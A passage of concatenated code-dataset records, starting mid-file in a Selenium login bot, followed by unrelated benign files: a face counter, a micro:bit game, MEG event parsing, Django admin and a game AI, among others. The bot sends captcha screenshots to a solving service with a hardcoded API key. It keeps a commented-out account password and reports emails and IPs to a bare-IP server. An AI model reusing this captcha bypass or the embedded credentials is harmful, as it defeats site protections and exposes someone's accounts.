passw = self.driver.find_element_by_xpath('//input[@type=\"password\"]')\n passw.send_keys(pwd)\n code = self.driver.find_elements_by_xpath('//input[@type=\"text\"]')[1]\n code.send_keys(\"\")\n\n time.sleep(1)\n\n x = self.device['xy']['x'] # 1872\n y = self.device['xy']['y'] # 688,438\n w = x + 205 # 275,230\n h = y + 40 # 50,38\n size = (x, y, w, h)\n img = ImageGrab.grab(size)\n img.save(\"C:/Users/moxi/Downloads/1.png\") # C:/Users/moxi/Downloads/1.png\n # img.show()\n\n time.sleep(5)\n\n # chaojiying = Chaojiying_Client('iwtay77', 'Iwt.ay77','ac212bb67ed8fce6a530514d9f478093') # 用户中心>>软件ID 生成一个替换 96001\n # im = open('C:/Users/moxi/Downloads/1.png', 'rb').read() # 本地图片文件路径 来替换 a.jpg 有时WIN系统须要//\n # yzm = chaojiying.PostPic(im, 1902)\n # print(yzm)\n # time.sleep(5)\n\n appkey = \"62a8949082d27515eeafbd101b64912a\"\n with open(\"C:/Users/moxi/Downloads/1.png\", 'rb') as f:\n base64_data = base64.b64encode(f.read())\n s = base64_data.decode()\n # print(s)\n\n textmob = {\n \"key\": appkey,\n \"codeType\": 4006,\n \"base64Str\": s\n }\n textmob = parse.urlencode(textmob).encode(encoding='utf-8')\n # print(textmob)\n\n req = urllib.request.Request(url=\"http://op.juhe.cn/vercode/index\", data=textmob)\n webpage = urllib.request.urlopen(req)\n html = webpage.read()\n res = json.loads(html)\n yzm = str(res[\"result\"])\n print(yzm)\n code.send_keys(yzm)\n time.sleep(2)\n self.driver.find_elements_by_xpath('//button[@class=\"color1___3wpTZ\"]')[0].click()\n print(i)\n if i == 1 :\n time.sleep(2)\n quit = self.driver.find_elements_by_xpath('//div[@class=\"am-tab-bar-tab\"]')[4]\n time.sleep(2)\n quit.click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"iconService___BeN5z\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"color1___3wpTZ\").click()\n time.sleep(1)\n self.driver.refresh()\n else:\n break\n\n time.sleep(2)\n url = \"http://200019.ip138.com/\"\n req = urllib.request.urlopen(url).read()\n # print(req)\n theIP = 
re.findall(r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}.\\d{1,3}\", str(req))\n ip = theIP[0]\n print(\"your IP Address is: \", ip)\n time.sleep(2)\n response = requests.post(\n f\"http://47.75.184.28/api/imessage-server/imessage-restapi/external/markEmail?email={username}&ip={ip}\")\n print(response.status_code)\n time.sleep(2)\n # deviceToken = self.driver.execute_script(\"return localStorage.getItem('appDeviceToken')\")\n # print(deviceToken)\n\n sideNav_list = self.driver.find_elements_by_xpath('//div[@class=\"listItem___12frK\"]')\n sideNav =random.choice(sideNav_list)\n time.sleep(2)\n sideNav.click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"theme1___341L1.undefined.button___3xxsI\")[0].click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"buttonItem___2sWKk\")[2].click()\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"iconRemove___3CKmq\")[0].click()\n time.sleep(7)\n # self.driver.find_element_by_xpath('//div[@class=\"theme1___341L1.undefined.button___3xxsI\"]').click()\n # time.sleep(2)\n self.driver.find_element_by_class_name(\"theme1___341L1.undefined.button___3xxsI\").click()\n time.sleep(2)\n self.driver.find_element_by_class_name(\"color1___3wpTZ\").click()\n time.sleep(2)\n # self.driver.find_element_by_xpath('//button[@data-position=\"bottom\"]').click()\n\n\nif __name__ == \"__main__\":\n F = filter()\n F.setUp()\n F.verify()\n F.quit()\n\n\n","sub_path":"978Pplay.py","file_name":"978Pplay.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"254021024","text":"import cv2\nimport imutils\nfrom datetime import datetime,timedelta\nimport statistics\n\nprint(cv2.__version__)\n\ncascPath = './haarcascade_frontalface_default.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\n#video_capture = cv2.VideoCapture(0)\nvideo_capture = cv2.VideoCapture(\"./pessoas_caminhando.mp4\")\n\ntotal = 0\nfont = 
cv2.FONT_HERSHEY_SIMPLEX\ninitBB = None\n\ntotal = []\nnext_update = datetime.now() + timedelta(seconds=30)\naverage = 0\nmaximo = 0\n\ndef get_average():\n global next_update\n global total\n global average\n now = datetime.now()\n if now > next_update:\n next_update = now + timedelta(seconds=30)\n average = int(statistics.median(total))\n total = []\n \n return average\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n if frame is None:\n break\n\n frame = imutils.resize(frame, width=700)\n (width, height, c) = frame.shape\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n #desenha os retangulos\n atual = 0\n for (x, y, w, h) in faces:\n atual = atual + 1\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n if atual > maximo:\n maximo = atual\n\n total.append(atual)\n\n cv2.putText(frame, \"Maximo: %s\" % maximo, (10, 20), font, 0.7, (255,165,0), 2, cv2.LINE_AA)\n\n average = get_average()\n\n cv2.putText(frame, \"Media (Mediana): %s\" % average, (10, 45), font, 0.7, (255,165,0), 2, cv2.LINE_AA)\n\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"172884944","text":"from microbit import *\nimport random\n\nbricksPos = []\n\nstep = 1\n\nclass Player:\n \"\"\"This is the play in the bottom\"\"\"\n def __init__(self, pos, HP):\n self.HP = HP\n self.pos = pos\n\n def shoot(self):\n \"\"\"Here a shot is being fired\"\"\"\n for n in [4,3,2,1,0]:\n \"\"\"If enemy is encountered\"\"\"\n shotPos = [self.pos[0],n-1]\n print(\"Shotpos\" + \" \" + str(shotPos))\n\n if 
shotPos in bricksPos:\n\n # Remove brick\n display.set_pixel(shotPos[0], shotPos[1], 0 )\n bricksPos.remove(shotPos)\n print(\"Brick is removed\" + str(bricksPos))\n break\n else:\n display.set_pixel(shotPos[0],n,9)\n sleep(100)\n display.set_pixel(shotPos[0], n, 0)\n\n\n def explode(self):\n \"\"\" Here a local explosion removes all nearby bricks\"\"\"\n\n combs = [\n [1, 0],\n [1, -1],\n [0, -1],\n [-1, 0],\n [-1, -1]\n ]\n # Lyser bombepixels\n for comb in combs:\n\n y = self.pos[1] + comb[1]\n x = self.pos[0] + comb[0]\n if -1 < x and x < 5 and -1 < y and y < 5:\n # bricks are removed\n display.set_pixel(x % 5, y % 5, 9)\n\n sleep(500)\n # Slukker igen\n for comb in combs:\n\n y = self.pos[1] + comb[1]\n x = self.pos[0] + comb[0]\n\n if -1 < x and x < 5 and -1 < y and y < 5:\n # bricks are removed\n display.set_pixel(x % 5, y % 5, 0)\n if [x % 5, y % 5] in bricksPos:\n bricksPos.remove([x % 5, y % 5])\n else:\n pass\n\n def move(self):\n if accelerometer.get_x() > 100:\n self.pos[0] = (self.pos[0] + 1) % 5\n elif accelerometer.get_x() < -100:\n self.pos[0] = (self.pos[0] - 1) % 5\n else:\n pass\n\nlukas = Player([2,4],9)\n# Game loop\nt = running_time()\nt_add = running_time()\nt_move = running_time()\n\nwhile True:\n if lukas.HP < 0:\n display.scroll(str(temperature()))\n display.scroll(\"GAME OVER\")\n\n\n # Setting character:\n display.set_pixel(lukas.pos[0],lukas.pos[1],lukas.HP)\n cols =[0, 1, 2, 3, 4]\n\n\n\n t_break = 3000*(0.95)**step\n while t_add + t_break < running_time():\n x = random.choice(cols)\n newBrickPos = [x,0]\n step += 1\n\n for brick in bricksPos:\n if brick == newBrickPos:\n # setting new brick\n if brick[1]+1 == 5:\n display.clear()\n lukas.HP -= 1\n bricksPos = []\n brick = [0,0]\n display.set_pixel(brick[0],brick[1]+1,5)\n\n newBrickPos[1] +=1\n\n else:\n # do nothing\n pass\n display.set_pixel(x,0,5)\n bricksPos.append(newBrickPos)\n\n t_add = running_time()\n\n while t_move + 300 < running_time():\n 
display.set_pixel(lukas.pos[0],lukas.pos[1],0)\n lukas.move()\n display.set_pixel(lukas.pos[0], lukas.pos[1], lukas.HP)\n t_move = running_time()\n\n if button_a.was_pressed():\n lukas.shoot()\n if button_b.was_pressed():\n lukas.explode()\n","sub_path":"tetris_like.py","file_name":"tetris_like.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"96158764","text":"import mne\nimport numpy as np\nimport warnings\nimport scipy.io as sio\n\n\ndef events_select_condition(trigger, condition):\n \"\"\"Function to handle events and event ids\n\n Parameters\n ----------\n trigger : np.array (dims = [n,1])\n The trigger values\n condition : str\n The set of events corresponding to a specific analysis.\n\n Returns\n -------\n selection : np.array (dims = [m, 1])\n The selected trigger.\n \"\"\"\n if condition == 'stim_motor':\n selection = np.where(trigger > 0)[0]\n elif condition == 'stim':\n selection = np.where((trigger > 0) & (trigger < 4096))[0]\n elif condition == 'motor': # remove response not linked to stim\n # selection = np.where((trigger > 64) & (trigger != 128))[0]\n selection = np.where(trigger >= 4096)[0]\n return selection\n\n\ndef get_events(bhv_fname, ep_name='both'):\n \"\"\"\"Get events from matlab file\n\n Parameters\n ----------\n bhv_fname : str\n mat file path with behavioral results\n ep_name : str (default: 'both')\n string indicating if output corresponds to 'stim' events, 'motor' events\n or 'both'\n\n Returns\n -------\n events_df : pd.DataFrame\n \"\"\"\n import pandas as pd\n\n trials = sio.loadmat(bhv_fname, squeeze_me=True,\n struct_as_record=True)[\"trials\"]\n\n # Redefine key to be more explicit\n keys = [('side', 'stim_side', int),\n ('amb', 'stim_category', float),\n ('amb_word', 'stim_category', float),\n ('target_code', 'stim_code', int),\n ('key', 'motor_side', int),\n ('correct', 'motor_correct', float),\n ('RT_MEG', 'motor_RT', float),\n 
('choice', 'motor_category', int)]\n\n # Create indexable dictionary\n events = list()\n for ii, trial in enumerate(trials):\n event = dict()\n # add already present fields\n for key in keys:\n event[key[1]] = trial[key[0]]\n\n # Add manual fields\n event['stim_active'] = trial['type'] == 1\n event['trigger_value'] = int(trial['ttl']['value'])\n event['motor_missed'] = not(event['motor_RT'] > 0.)\n event['trial_number'] = ii\n\n # ---- stimulus categorical ambiguity\n # NB: There seems to be an error in the matlab postproc code regarding\n # trials.amb_word. We thus need to redefine the conditions properly.\n if trial['target_code'] in [1, 2]: # [['540', 'SHO'], ['560', 'SEO']]\n event['stim_category'] = (trial['amb'] - 1.0) / 7.0\n elif trial['target_code'] in [3, 5]: # [[540, 590], [560, 580]]\n event['stim_category'] = 0.0\n elif trial['target_code'] in [4, 6]: # [[SHO, SAO], [SEO, SCO]]\n event['stim_category'] = 1.0\n else:\n raise('problem target_code!')\n\n # ---- type of passive stimulus\n if not(event['stim_active']):\n # [[540, 590], [560, 580], [SHO, SAO], [SEO, SCO]]\n if trial['amb'] == 1:\n event['stim_new'] = 0\n elif trial['amb'] == 8:\n event['stim_new'] = 1\n else:\n raise('problem target code')\n else:\n event['stim_new'] = 0\n\n # ---- stimulus contrast\n if trial['target_code'] in [1, 3, 4, 5]:\n event['stim_contrast'] = event['stim_category']\n elif trial['target_code'] in [2, 6]:\n event['stim_contrast'] = 1.0 - event['stim_category']\n else:\n raise('problem target_code!')\n\n # previous trial\n if len(events) > 1:\n if ep_name == 'both':\n previous_event = events[-2]\n else:\n previous_event = events[-1]\n for key in ['stim_category', 'stim_side',\n 'motor_category', 'motor_side']:\n event['previous_' + key] = previous_event[key]\n\n # Concatenate stim event\n if (ep_name == 'stim_lock' or ep_name == 'both'):\n event['event_type'] = 'stim'\n events.append(event)\n\n # Add motor event subject responded so as to get a single events\n # 
structure for both stim and resp lock\n if (ep_name == 'motor_lock' or ep_name == 'both'):\n if event['stim_active']:\n event_ = event.copy()\n event_['event_type'] = 'motor'\n events.append(event_)\n\n # store and panda DataFrame for easier manipulation\n events_df = pd.DataFrame(events)\n # RT bin\n speed_labels = ['none', 'fast', 'slow']\n speeds = np.percentile(events_df['motor_RT'], [50])\n events_df['motor_speed'] = None\n for ii in range(len(events)):\n rt = events_df['motor_RT'][ii]\n motor_speed = speed_labels[len(np.where(speeds < rt)[0]) + (rt > 0)]\n events_df['motor_speed'][ii] = motor_speed\n return events_df\n\n\ndef extract_events(fname, min_duration=0.003, first_sample=0,\n offset_to_zero_M=True, offset_to_zero_S=False):\n \"\"\"Function to 1) recompute STI101 from other channels\n 2) clean trigger channel\n 3) Add stimulus information to response channel\n\n Parameters\n ----------\n fname : str\n The filename of the event dataset.\n min_duration : float\n The minimum duration (in s) of an event\n\n Returns\n -------\n events : np.array (dims = [n_events, 3])\n Events array to pass to MNE.\n \"\"\"\n # Load data\n if fname is str:\n raw = mne.io.Raw(fname, preload=True)\n else:\n raw = fname.copy()\n\n # Dissociate STI101 into distinct channels\n raw.pick_channels(['STI101'])\n n_bits = 16\n raw._data = np.round(raw._data)\n data = np.zeros((n_bits, raw.n_times))\n for bit in range(0, n_bits)[::-1]:\n data[bit, :] = (raw._data >= 2 ** bit).astype(float)\n raw._data -= data[bit, :] * (2 ** bit)\n\n # Min duration in sample\n min_sample = min_duration * raw.info['sfreq']\n\n # Binarize trigger values to 0 and 1\n S_ch = range(0, 11)\n # Get all motor events, independently of task relevance\n cmb_M_, sample_M_ = _combine_events(data[len(S_ch):, :], min_sample,\n first_sample=first_sample,\n overlapping=False,\n offset_to_zero=offset_to_zero_M)\n # Only consider stim triggers after first button response (to avoid trigger\n # test trhat shouldn't have 
been recorded)\n cmb_S, sample_S = _combine_events(data[0:len(S_ch), :], min_sample,\n first_sample=sample_M_[0],\n overlapping=True,\n offset_to_zero=offset_to_zero_S)\n\n # Correct order of magnitude of M response to avoid S/M conflict\n cmb_M_ *= (2 ** len(S_ch))\n\n # Get trigger values for stim and unassociated motor\n trigger_S, trigger_M_ = cmb_S[sample_S], cmb_M_[sample_M_]\n\n # Select M responses relevant to task: first M response following trigger\n # max_delay = raw.info['sfreq'] * (2.000 + .430)\n sample_M, trigger_M = list(), list()\n for s, S in enumerate(sample_S):\n # Find first M response\n M = np.where(np.array(sample_M_) > S)[0]\n # Check its link to S\n # if (any(M) and (sample_M_[M[0]] - S) <= max_delay):\n if any(M):\n if trigger_S[s] <= 4.0: # no trigger if stim is passive\n # Add motor response to motor\n sample_M.append(sample_M_[M[0]])\n # Associate S value to M to link the two\n trigger_M.append(trigger_M_[M[0]] + trigger_S[s])\n\n # Combine S and M events\n events_S = [sample_S, np.zeros(len(sample_S)), trigger_S]\n events_M = [sample_M, np.zeros(len(sample_M)), trigger_M]\n events = np.hstack((events_S, events_M)).transpose()\n\n # Sort events chronologically\n events = events[np.argsort(events[:, 0]), :]\n\n # Add starting sample\n events[:, 0] += raw.first_samp\n\n return events\n\n\ndef _combine_events(data, min_sample, first_sample=0, overlapping=True,\n offset_to_zero=True):\n \"\"\" Function to combine multiple trigger channel into binary code \"\"\"\n n_chan, n_sample = data.shape\n cmb = np.zeros([n_chan, n_sample])\n for bit in range(0, n_chan):\n cmb[bit, :] = 2 ** bit * data[bit, :]\n cmb = np.sum(cmb, axis=0)\n\n if not overlapping:\n over_t = np.where(np.sum(data, axis=0) > 1.0)[0]\n cmb[over_t] = 0.0\n\n # Find trigger onsets and offsets\n diff = cmb[1:] - cmb[0:-1]\n diff[:first_sample] = 0 # don't consider triggers before this\n onset = np.where(diff > 0)[0] + 1\n offset = np.where(diff < 0)[0]\n\n # minimum changing 
time\n onset_t = np.where((onset[1:] - onset[:-1]) >= min_sample)[0]\n onset = onset[np.append(onset_t, len(onset_t))]\n offset_t = np.where((offset[1:] - offset[:-1]) >= min_sample)[0] + 1\n offset = offset[np.append(0, offset_t)]\n\n # first offsets should be after first onset\n if offset[0] < onset[0]:\n offset = offset[1:]\n # offsets must go back to 0\n if offset_to_zero:\n offset = offset[np.where(cmb[offset+1] == 0.)[0]]\n # XXX should do the same for onset?:\n # onset = onset[np.where(cmb[onset-1] == 0.)[0]]\n if len(onset) > len(offset):\n # onset = onset[:-1]\n offset = np.hstack((offset, onset[-1] + min_sample))\n warnings.warn(\"Added extra offset!\")\n\n # Remove too short samples\n duration = offset - onset\n sample = onset[duration > min_sample].tolist()\n\n return cmb, sample\n","sub_path":"ambiguity/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650072582","text":"import requests\r\nfrom ..base.test import BaseTestCase, AuthorizedTestCase\r\nimport uuid\r\nimport common\r\n\r\n\r\nclass T(AuthorizedTestCase):\r\n\r\n @property\r\n def path(self):\r\n return '/service/secu/underway'\r\n\r\n def setUp(self):\r\n super().setUp()\r\n self.data = {\r\n \"itemid\": \"a6523c40a08f481a92c25c6945dc7b41\",\r\n \"userid\": self.user['id']\r\n }\r\n\r\n query = '''\r\n insert into todo_underway(itemid, userid) values (:itemid, :userid);\r\n '''\r\n self.db.execute(query, self.data)\r\n self.db.commit()\r\n\r\n def test_by_correct_info(self):\r\n response = requests.delete(self.url, json={'itemid': self.data['itemid']})\r\n self.assertNotEqual(response.text, '', '返回值为空!')\r\n resp = response.json()\r\n self.assertEqual('000', resp['code'])\r\n\r\n query = '''\r\n select count(1) from todo_underway where userid=:userid and itemid=:itemid;\r\n '''\r\n\r\n result = self.db.execute(query, self.data).scalar()\r\n\r\n 
self.assertEqual(0, result)\r\n","sub_path":"secu/tests/underway_delete_test.py","file_name":"underway_delete_test.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"353375198","text":"#!/usr/bin/env python3\n\"\"\"My solution to day 5 of Advent of Code\nhttp://adventofcode.com/day/5\n\"\"\"\n\nimport sys\n\nVOWELS = 'aeiou'\n\ndef is_nice(s):\n num_vowels = 0\n for c in s:\n if c in VOWELS:\n num_vowels += 1\n if num_vowels == 3:\n break\n if num_vowels < 3:\n return False\n\n if 'ab' in s or 'cd' in s or 'pq' in s or 'xy' in s:\n return False\n\n letter = ''\n for c in s:\n if c == letter:\n return True\n else: letter = c\n return False\n\ndef count_nice(strings):\n amount = 0\n for line in strings.splitlines():\n if is_nice(line):\n amount += 1\n return amount\n\ndef is_nicer(s):\n pairs = []\n for i in range(0,len(s)-1):\n pairs.append(s[i] + s[i+1])\n pairs = set(pairs)\n for i in pairs:\n if s.count(i) > 1:\n break\n else:\n return False\n\n for i in range(0, len(s)-2):\n if s[i] == s[i+2]:\n return True\n\ndef count_nicer(strings):\n amount = 0\n for line in strings.splitlines():\n if is_nicer(line):\n amount += 1\n return amount\n\nif __name__ == '__main__' and len(sys.argv) > 1 and len(sys.argv[1]) > 0:\n print('Number of nice strings:', count_nice(sys.argv[1]))\n print('Number of nicer strings:', count_nicer(sys.argv[1]))\n","sub_path":"day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64267635","text":"\"\"\"Treadmill app configurator daemon, subscribes to eventmgr events.\n\"\"\"\n\nimport click\n\nfrom .. 
import appcfgmgr\n\n\ndef init():\n \"\"\"Top level command handler.\"\"\"\n\n @click.command()\n @click.option('--approot', type=click.Path(exists=True),\n envvar='TREADMILL_APPROOT', required=True)\n def top(approot):\n \"\"\"Starts appcfgmgr process.\"\"\"\n mgr = appcfgmgr.AppCfgMgr(root=approot)\n mgr.run()\n\n return top\n","sub_path":"treadmill/sproc/appcfgmgr.py","file_name":"appcfgmgr.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635726911","text":"from datetime import datetime\nfrom django.contrib import admin\nfrom .models import *\n\ndef iniciar_tarea(modeladmin, request, queryset):\n for tarea in queryset:\n bitacora = Bitacora()\n bitacora.tarea = tarea\n bitacora.save()\n\ndef finalizar_tarea(modeladmin, request, queryset):\n queryset.update(terminada=True)\n\ndef finalizar_bitacora(modeladmin, request, queryset):\n queryset.update(fin=datetime.now())\n\nclass TareaInLine(admin.TabularInline):\n model = Tarea\n extra = 1\n\n\nclass BitacoraInLine(admin.StackedInline):\n model = Bitacora\n extra = 1\n\n\n@admin.register(Proyecto)\nclass ProyectoAdmin(admin.ModelAdmin):\n inlines = [TareaInLine]\n\n\n@admin.register(Tarea)\nclass TareaAdmin(admin.ModelAdmin):\n list_display = [\n 'nombre',\n 'descripcion',\n 'proyecto',\n 'terminada',\n 'fecha_de_entrega',\n 'usuario',\n 'responsable'\n ]\n actions = [iniciar_tarea, finalizar_tarea]\n list_filter = ['responsable', 'terminada']\n inlines = [BitacoraInLine]\n\n def get_queryset(self, request):\n qs = super(TareaAdmin, self).get_queryset(request)\n if not request.user.is_superuser:\n qs = qs.filter(responsable=request.user)\n return qs\n\n def save_model(self, request, obj, form, change):\n if not request.user.is_superuser:\n obj.responsable = request.user\n obj.save()\n\n\n@admin.register(Bitacora)\nclass BitacoraAdmin(admin.ModelAdmin):\n list_display = [\n 'tarea',\n 'inicio',\n 'fin'\n ]\n actions = 
[finalizar_bitacora]\n\n def get_queryset(self, request):\n qs = super(BitacoraAdmin, self).get_queryset(request)\n if not request.user.is_superuser:\n qs = qs.filter(tarea__responsable__id=request.user.id)\n return qs\n","sub_path":"pepepecas/apps/bitacora/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279686778","text":"#-*-python-*-\nfrom BaseAI import BaseAI\nfrom GameObject import *\nimport math\nimport random\n\nclass AI(BaseAI):\n \"\"\"The class implementing gameplay logic.\"\"\"\n @staticmethod\n def username():\n return \"Shell AI\"\n\n @staticmethod\n def password():\n return \"password\"\n \n MOTHER = 0\n SPAWNER = 1\n CHOKER = 2\n SOAKER = 3\n BUMBLEWEED = 4\n ARALIA = 5\n TITAN = 6\n POOL = 7\n\n ##This function is called once, before your first turn\n def init(self):\n #set up me field\n self.me = self.players[self.playerID]\n #set up mother field\n self.mother = self.getMyPlants()[0]\n \n #set up directionOfEnemy field\n #if our mother is on the left side of the map, the enemy must be on the right side\n #and vice versa of course\n if self.mother.x < self.mapWidth/2:\n self.directionOfEnemy = 1\n else:\n self.directionOfEnemy = -1\n pass\n\n ##This function is called once, after your last turn\n def end(self):\n pass\n\n ##This function is called each time it is your turn\n ##Return true to end your turn, return false to ask the server for updated information\n def run(self):\n myPlants = self.getMyPlants()\n #for every plant we own, move them forward and attack if it finds an enemy\n for plant in myPlants:\n #only try radiating if it's possible\n if plant.radiatesLeft > 0:\n #only heal or buff allies and attack enemies\n targetOwner = 1 - self.playerID\n if plant.mutation == self.BUMBLEWEED or plant.mutation == self.SOAKER:\n targetOwner = self.playerID\n\n for foe in self.plants:\n #if it's dead skip it\n if foe.rads 
>= foe.maxRads:\n continue\n\n #don't mess with pools\n if foe.mutation == self.POOL:\n continue\n\n #if it's not the right target\n if foe.owner != targetOwner:\n continue\n\n #if a healer or soaker can't effect the mother weed\n if targetOwner == self.playerID and foe.mutation == self.MOTHER:\n continue\n\n #if a soaker can't effect other soakers\n if plant.mutation == self.SOAKER and foe.mutation == self.SOAKER:\n continue\n\n #if we're within range...\n if self.distance(plant.x, plant.y, foe.x, foe.y) < plant.range:\n #get 'im!\n plant.radiate(foe.x, foe.y)\n break\n\n #move them straight to the other side. no regrets.\n #move as far as possible, as long as it's not off the map\n wantedX = plant.x\n if plant.mutation == self.BUMBLEWEED:\n wantedX += self.directionOfEnemy * self.bumbleweedSpeed\n else:\n wantedX += self.directionOfEnemy * self.uprootRange\n if plant.uprootsLeft > 0 and self.getPlantAt(wantedX, plant.y) is None and 0 <= wantedX < self.mapWidth:\n plant.uproot(wantedX, plant.y)\n\n #make a new plant every turn, because why not?\n #first, check if we can actually do that\n if len(myPlants) >= self.maxPlants:\n #end turn\n return True\n\n spawnX = -1\n spawnY = -1\n angle = 0\n loc = 0\n for plant in myPlants:\n #remove all plants in our list except for mothers and spawners\n if not (plant.mutation == self.MOTHER or plant.mutation == self.SPAWNER):\n myPlants.remove(plant)\n\n #get a random spawner or mother plant\n spawnerPlant = myPlants[random.randint(0, len(myPlants) - 1)]\n\n #get a new position centered around that spawner within its range\n #also, keep generating new coordinates until they become valid ones\n #Remember from trig:\n #(random x inside a circle) = centerX + rand(0,1)*radius*cos(angle)\n spawnCheckLimit = 0\n while not self.withinBounds(spawnX, spawnY) or self.getPlantAt(spawnX, spawnY) is not None:\n angle = random.random() * 2 * math.pi\n while spawnX < 0 or spawnX >= self.mapWidth:\n spawnX = spawnerPlant.x + 
int(random.random() * spawnerPlant.range * math.cos(angle))\n while spawnY < 0 or spawnY >= self.mapHeight:\n spawnY = spawnerPlant.y + int(random.random() * spawnerPlant.range * math.sin(angle))\n spawnCheckLimit += 1\n #if we try to spawn too many times, just give up and end the turn\n if spawnCheckLimit > 10:\n return True\n #spawn a random type of plant that isn't a mother or a pool at the coordinates we made\n #of course, make sure we have enough spores to do the job!\n mutationType = random.randint(1, 6)\n if self.me.spores >= self.mutations[mutationType].spores and self.withinSpawnerRange(spawnX, spawnY):\n self.me.germinate(spawnX, spawnY, mutationType)\n return 1\n\n #Helper function to get all of the plants owned\n def getMyPlants(self):\n myPlants = []\n for plant in self.plants:\n if plant.owner == self.playerID:\n myPlants.append(plant)\n return myPlants\n\n #Helper function to get distance as a whole number\n def distance(self, x1, y1, x2, y2):\n return int((math.sqrt(math.pow(x1-x2,2)+math.pow(y1-y2,2))))\n \n #Helper function to get a Plant at a point\n #Returns None if no plant found\n def getPlantAt(self, x, y):\n #if it's out of bounds, we don't need to check anything\n if not self.withinBounds(x, y):\n return None\n \n #for every plant, if a plant is at the position we want, return it\n for plant in self.plants:\n if plant.x == x and plant.y == y:\n return plant\n\n return None\n\n #Helper function for bounds checking\n def withinBounds(self, x, y):\n if x < 0 or x >= self.mapWidth or y < 0 or y >= self.mapHeight:\n return False\n return True\n\n #Helper function to check if we're within range of a Spawner or Mother\n def withinSpawnerRange(self, x, y):\n #No need to check if we're not within the bounds of the map\n if not self.withinBounds(x, y):\n return False\n\n #for every plant\n for plant in self.plants:\n #check for ownership and correct mutation\n if plant.owner == self.me.id and (plant.mutation == self.SPAWNER or plant.mutation == 
self.MOTHER):\n #if we're within range, we're good\n if self.distance(x, y, plant.x, plant.y) < plant.range:\n return True\n\n #if we found none, nope\n return False\n\n def __init__(self, conn):\n BaseAI.__init__(self, conn)\n","sub_path":"ShellAI/python/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395359689","text":"import sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nimport argparse\nimport torch\nimport time\nimport os.path as osp\nfrom torch.nn.parallel import DataParallel\nfrom UW.utils import Config\nfrom UW.core.Models import build_network\nfrom UW.core.Datasets import build_dataset, build_dataloader\nfrom UW.core.Optimizer import build_optimizer, build_scheduler\nfrom UW.utils import (mkdir_or_exist, get_root_logger,\n save_epoch, save_latest, save_item, normimage_test,\n resume, load, normPRED)\n\nfrom UW.utils.save_image import (save_image, normimage,\n save_ensemble_image, save_ensemble_image_8)\n\n\nfrom tensorboardX import SummaryWriter\n# TORCH_VERSION = torch.__version__\n# if TORCH_VERSION < '1.1' or TORCH_VERSION == 'parrots':\n# try:\n# from tensorboardX import SummaryWriter\n# except ImportError:\n# raise ImportError('Please install tensorboardX to use '\n# 'TensorboardLoggerHook.')\n# else:\n# try:\n# from torch.utils.tensorboard import SummaryWriter\n# except ImportError:\n# raise ImportError(\n# 'Please run \"pip install future tensorboard\" to install '\n# 'the dependencies to use torch.utils.tensorboard '\n# '(applicable to PyTorch 1.1 or higher)')\n\nfrom getpass import getuser\nfrom socket import gethostname\ndef get_host_info():\n return f'{getuser()}@{gethostname()}'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('--config',type=str,\n 
default='/home/dong/GitHub_Frame/UW/config/UWCNN.py',\n help='train config file path')\n parser.add_argument('--load_from',\n default='/home/dong/GitHub_Frame/UW/checkpoints/UWCNN/UWCNN_type3.pth',\n help='the dir to save logs and models,')\n parser.add_argument('--savepath', help='the dir to save logs and models,')\n group_gpus = parser.add_mutually_exclusive_group()\n group_gpus.add_argument(\n '--gpus',\n default=1,\n type=int,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n group_gpus.add_argument(\n '--gpu-ids',\n type=int,\n nargs='+',\n help='ids of gpus to use '\n '(only applicable to non-distributed training)')\n args = parser.parse_args()\n return args\n\n\n\nif __name__ == '__main__':\n args = parse_args()\n cfg = Config.fromfile(args.config)\n if args.load_from is not None:\n # update configs according to CLI args if args.work_dir is not None\n cfg.load_from = args.load_from\n if args.savepath is not None:\n # update configs according to CLI args if args.work_dir is not None\n cfg.savepath = args.savepath\n elif cfg.get('work_dir', None) is None:\n # use config filename as default work_dir if cfg.work_dir is None\n cfg.savepath = osp.join('./results',\n osp.splitext(osp.basename(args.config))[0])\n if args.gpu_ids is not None:\n cfg.gpu_ids = 